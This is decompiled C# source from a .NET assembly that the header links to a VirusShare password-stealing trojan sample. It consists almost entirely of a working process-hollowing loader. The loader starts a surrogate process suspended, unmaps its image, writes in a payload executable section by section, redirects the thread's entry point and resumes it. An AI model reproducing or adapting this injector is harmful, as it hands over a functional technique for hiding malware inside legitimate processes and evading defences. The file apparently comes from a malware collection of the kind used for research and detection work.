// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: rern5947, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8B36B2BF-40BC-44F3-B93C-15B2B8352B1E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-a576b1abcd43c510ab00c17e3ffa306ae5ce6f3677c5612d44e1584c0df44030.exe

using System;
using System.Runtime.InteropServices;
using System.Text;

public class IX
{
  [DllImport("kernel32")]
  [return: MarshalAs(UnmanagedType.Bool)]
  private static extern bool CreateProcess(
    string appName,
    StringBuilder commandLine,
    IntPtr procAttr,
    IntPtr thrAttr,
    [MarshalAs(UnmanagedType.Bool)] bool inherit,
    int creation,
    IntPtr env,
    string curDir,
    byte[] sInfo,
    IntPtr[] pInfo);

  [DllImport("kernel32")]
  [return: MarshalAs(UnmanagedType.Bool)]
  private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);

  [DllImport("kernel32")]
  private static extern bool SetThreadContext(IntPtr t, uint[] c);

  [DllImport("ntdll")]
  private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);

  [DllImport("kernel32")]
  [return: MarshalAs(UnmanagedType.Bool)]
  private static extern bool ReadProcessMemory(
    IntPtr hProc,
    IntPtr baseAddr,
    ref IntPtr bufr,
    int bufrSize,
    ref IntPtr numRead);

  [DllImport("kernel32.dll")]
  private static extern uint ResumeThread(IntPtr hThread);

  [DllImport("kernel32")]
  private static extern IntPtr VirtualAllocEx(
    IntPtr hProc,
    IntPtr addr,
    IntPtr size,
    int allocType,
    int prot);

  [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
  private static extern bool VirtualProtectEx(
    IntPtr hProcess,
    IntPtr lpAddress,
    IntPtr dwSize,
    uint flNewProtect,
    ref uint lpflOldProtect);

  [DllImport("kernel32.dll", SetLastError = true)]
  private static extern bool WriteProcessMemory(
    IntPtr hProcess,
    IntPtr lpBaseAddress,
    byte[] lpBuffer,
    uint nSize,
    out int lpNumberOfBytesWritten);

  public static bool R(byte[] bytes, string surrogateProcess)
  {
    try
    {
      IntPtr zero1 = IntPtr.Zero;
      IntPtr[] pInfo = new IntPtr[4];
      byte[] sInfo = new byte[68];
      int int32 = BitConverter.ToInt32(bytes, 60);
      int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
      IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
      if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
      {
        uint[] numArray1 = new uint[179];
        numArray1[0] = 65538U;
        if (IX.GetThreadContext(pInfo[1], numArray1))
        {
          IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
          IntPtr zero2 = IntPtr.Zero;
          IntPtr bufrSize = new IntPtr(4);
          IntPtr zero3 = IntPtr.Zero;
          if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
          {
            IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
            IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
            IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
            int lpNumberOfBytesWritten;
            IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
            int num3 = int16 - 1;
            for (int index = 0; index <= num3; ++index)
            {
              int[] dst = new int[10];
              Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
              byte[] numArray2 = new byte[dst[4] - 1 + 1];
              Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
              num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
              num1 = new IntPtr(numArray2.Length);
              IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
            }
            num2 = new IntPtr((long) numArray1[41] + 8L);
            num1 = new IntPtr(4);
            IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
            numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
            IX.SetThreadContext(pInfo[1], numArray1);
          }
        }
        int num = (int) IX.ResumeThread(pInfo[1]);
      }
    }
    catch
    {
      return false;
    }
    return true;
  }
}